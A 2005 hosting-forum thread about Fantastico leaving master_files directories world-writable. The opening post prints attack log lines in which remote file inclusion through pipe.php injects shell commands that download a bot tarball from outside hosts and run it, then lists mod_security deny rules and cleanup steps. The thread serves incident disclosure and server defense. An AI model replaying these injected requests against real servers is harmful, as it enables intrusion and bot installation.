Fantastico Issue - Improper chmod settings allows exploits to be ran - READ ASAP

**HostMerit** · 10-20-2005 01:48 AM

Saw files running from /var/netenberg for the 2nd - 3rd time - Seems these dirs are 777 permissions, and people are starting to mass distribute scripts that take advantage of this overlook of security:

Code:

root@edge [~]# cd /proc/24106
root@edge [/proc/24106]# ls -al
total 0
dr-x------    3 nobody   nobody          0 Oct 19 00:15 ./
dr-xr-xr-x  206 root     root            0 Oct 14 12:50 ../
dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:10 attr/
-r--------    1 nobody   nobody          0 Oct 20 02:10 auxv
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 cwd -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/
-r--------    1 nobody   nobody          0 Oct 20 01:54 environ
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/httpd
*
dr-x------    2 nobody   nobody          0 Oct 19 00:15 fd/
-r--------    1 nobody   nobody          0 Oct 20 02:10 ipaddr
-r--r--r--    1 nobody   nobody          0 Oct 20 02:10 maps
-rw-------    1 nobody   nobody          0 Oct 20 02:10 mem
-r--r--r--    1 nobody   nobody          0 Oct 20 02:10 mounts
-rw-r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_adj
-r--r--r--    1 nobody   nobody          0 Oct 20 02:10 oom_score
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:10 root -> //
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
-r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:10 task/

root@edge [/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default]# cd /proc/3222
root@edge [/proc/3222]# ls -al
total 0
dr-x------    3 nobody   nobody          0 Oct 18 18:00 ./
dr-xr-xr-x  218 root     root            0 Oct 14 12:50 ../
dr-xr-xr-x    2 nobody   nobody          0 Oct 20 02:11 attr/
-r--------    1 nobody   nobody          0 Oct 20 02:11 auxv
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 cmdline
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 cwd -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/
-r--------    1 nobody   nobody          0 Oct 20 01:54 environ
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:00 exe -> /var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/eggdrop-1.6.12*
dr-x------    2 nobody   nobody          0 Oct 18 18:00 fd/
-r--------    1 nobody   nobody          0 Oct 20 02:11 ipaddr
-r--r--r--    1 nobody   nobody          0 Oct 20 02:11 maps
-rw-------    1 nobody   nobody          0 Oct 20 02:11 mem
-r--r--r--    1 nobody   nobody          0 Oct 20 02:11 mounts
-rw-r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_adj
-r--r--r--    1 nobody   nobody          0 Oct 20 02:11 oom_score
lrwxrwxrwx    1 nobody   nobody          0 Oct 20 02:11 root -> //
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 stat
-r--r--r--    1 nobody   nobody          0 Oct 20 02:00 statm
-r--r--r--    1 nobody   nobody          0 Oct 20 01:54 status
dr-xr-xr-x    3 nobody   nobody          0 Oct 20 02:11 task/
root@edge [/proc/3222]# cd /var/netenberg/fantastico_de_luxe/

It appears all of these are exploitable.

I finally traced back to the exploitable script being used to mass distribute this, exploitable help center files (Installed by Fantastico also)

Code:

root@edge [/usr/local/apache/domlogs]# grep "neten" xxxxxxx
200.158.9.221 - - [19/Oct/2005:00:06:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/filesys/;ls%20-la HTTP/1.0" 200 2427 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:07:07 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/irclordz/;ls%20-la HTTP/1.0" 200 5726 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:07:30 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/Drupal/files/.var;ls%20-la HTTP/1.0" 200 3494 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:09:52 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;ls%20-la HTTP/1.0" 200 3399 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:10:09 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/;mkdir%20.www HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:11:05 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.liquidhost.biz/call/.doc/bot.tar HTTP/1.1" 200 2809 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:11:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;tar%20-xf%20bot.tar;rm%20bot.tar HTTP/1.1" 200 2255 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:11:47 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3287 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:14:27 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;curl%20-O%20http://www.anc01.oi.com.br/mh HTTP/1.0" 200 2553 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:14:36 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;./httpd%20-b%20mh HTTP/1.0" 200 2695 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:40:43 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;ls%20-la HTTP/1.0" 200 3532 "-" "Opera/8.50 (Windows NT 5.1; U; en)"
200.158.9.221 - - [19/Oct/2005:00:40:49 -0400] "GET /helpcenter/inc/pipe.php?HCL_path=http://vesgo.50megs.com/cse.gif?&cmd=cd%20/var/netenberg/fantastico_de_luxe/master_files/4Images_Gallery/templates/default/media/.www/;mkdir%20.ani HTTP/1.0" 200 2236 "-" "Opera/8.50 (Windows NT 5.1; U; en)"

I would suggest if you have not yet, please install mod_security, this is now available to be done from WHM, or you can visit http://www.nuclearelephant.com/projects/mod_evasive/

This is ESSENTIAL to any server, you can find a ruleset at www.gotroot.com or email me at kris@hostmerit.com for my ruleset I've developed over the last year or so

Below are the rulesets I've developed to keep our servers secure from this security overlook, APPLY THESE MOD SECURITY RULES IMMEDIATELY.

SecFilter "arta\.zip"
SecFilter "cmd=cd\x20/var"
SecFilter "master_files"
SecFilter "HCL_path"
SecFilter "clamav-partial"
SecFilter "vi\.recover"
SecFilter "netenberg"
SecFilter "pipe.php"
SecFilter "cse.gif"
SecFilter "psybnc"
SecFilter "fantastico_de_luxe"

Also,

apf -d vesgo.50megs.com
apf -d 64.136.24.0/24

I have no possible need to have packets incoming from insecure webspace, hence I've blocked the c-block it came from.

One more thing, chances are you're already infected, multiple times.

I would kill the /var/netenberg directory and do a fresh install.
You can also check by cd /var/netenberg then find ./ -user nobody, then remove any scripts owned / modified by nobody, as all real scripts have root permissions.

Right after, do:

Code:

chattr +i -R /var/netenberg/

If anyone tried installing these scripts when they were hacked / had rogue files inside them(which is a very very good chance), you just helped your client autoinstall exploit script...

It appears Netenberg has known about this, yet is slacking on fixing it.

Judging as you can now run files / compile / etc - If any people have unpatched kernels, there is a possibility of being rooted from this... I think it was necessary to disclose how to fix / patch this. No hate against Netenberg or Fantastico, but you must keep your server secure, I suggest you apply the above SecFilter into your mod security configuration ASAP.

-Kris

http://www.hostmerit.com

kris@hostmerit.com

**Izzee** · 10-20-2005 08:01 AM

Thanks for the heads up on this one. You have been very thorough in your efforts at securing these issues.
My servers all checked out just fine and so I have instigated your recommendations and hopefully should be secure once again, till the next hole is discovered.

The link to Got Root site has one of the best collection of modsec signature files I have ever seen. I bookmarked for a closer look later.
Well done!

**DigiCrime** · 10-20-2005 12:31 PM

Have you emailed Kosmo or left a message on their board about it ?

**elitewebninja** · 10-20-2005 01:43 PM

Yeah... he did.

It seems that they already knew about the issue:
http://www.netenberg.com/forum/viewtopic.php?t=3399

**HostMerit** · 10-20-2005 03:20 PM

They've known for a few weeks, but haven't done anything

They asked for 'a few more releases to fix it'

Which I didnt seem fit

If anyone would like MY ruleset

It is at http://www.hostmerit.com/modsec.user.conf

This is assuming you used CPanel / WHM Addon Modules to install Mod_sec

This would go in /usr/local/apache/conf/

**jackie46** · 10-20-2005 04:04 PM

Hi thanks for that;

Just a quick parusal and i notice these two rules duplicated.

SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "

**dalem** · 10-20-2005 10:50 PM

HostMerit great post

and great link to www.gotroot.com
I implimented the ruleset from there found that the blacklist.conf & blacklist2.conf were little to restrictive

**Izzee** · 10-21-2005 12:42 AM

Form a very recent post on the Netenberg forums by Kosmo:

Fantastico will do following:
- remove all masterfiles (in order to delete all infections but this can only be done if the masterfiles are not protected)
- uncompress the tarballs to masterfiles
- protect the masterfiles (chattr/chflags)

Virtuozzo powered VPS disallows the use of the chattr flag.
How will these masterfiles on a Virt. VPS be protected I wonder?

**moogle** · 10-21-2005 01:45 AM

Will disabling or removing helpcenter resolve the issue?
I found mine in Gallery and Zen Cart.

**HostMerit** · 10-21-2005 01:59 AM

Any script can be exploited or installed into, its the 777 permissions set by Fantastico on it.

Using my new rules + other rules will block this rubbish. My ruleset has been compiled by me over the last 6+ months, with some default, some from GotRoot, and some I've found myself to work well since I've implemented it. My ruleset should not be restrictive as it has special rules from Gotroot also to allow programs that call commands in a vunerable way pass through, without disabling the security module.

I've found you cant nearly load all of GotRoot's scripts, but alot are good for a Cpanel enviroment, I also used to work security for a rather large web hosting company, so I know how these people think.

**chirpy** · 10-21-2005 04:19 AM

Although not a cPanel issue, I've made this sticky for now until netenberg release a fix.

**jackie46** · 10-21-2005 08:55 AM

Originally Posted by Izzee

Form a very recent post on the Netenberg forums by Kosmo:Virtuozzo powered VPS disallows the use of the chattr flag.
How will these masterfiles on a Virt. VPS be protected I wonder?

Well i had to use HostMerit's ruleset as i was having Apache restart issues with the Apache 1.x ruleset's. The ruleset i was having an issue with is

rules.conf
blacklist.conf

Apache 1.x does not like something in that ruleset and i didnt botther checking any futher.

**kosmo** · 10-21-2005 12:07 PM

to all:

Please update to Fantastico 2.10.0 r15 asap.

kosmo

**chae** · 10-21-2005 02:37 PM

Thank You Kosmo

**mambovince** · 10-21-2005 06:42 PM

Originally Posted by Izzee

Form a very recent post on the Netenberg forums by Kosmo:Virtuozzo powered VPS disallows the use of the chattr flag.
How will these masterfiles on a Virt. VPS be protected I wonder?

Any news on this?
Can I use the WHM to update Fantastico on a Vituozo VPS server?

Thanks,

- Vince

LinkBack

Thread Tools

Fantastico Issue - Improper chmod settings allows exploits to be ran - READ ASAP

MAIL Issue Need Help ASAP

Emergency! Need help ASAP!! Please Read!

Strange IMAP issue. Need help ASAP.

!i Need Help Asap Please Read This!

Bought Fantastico from cpskins.com? Please read this!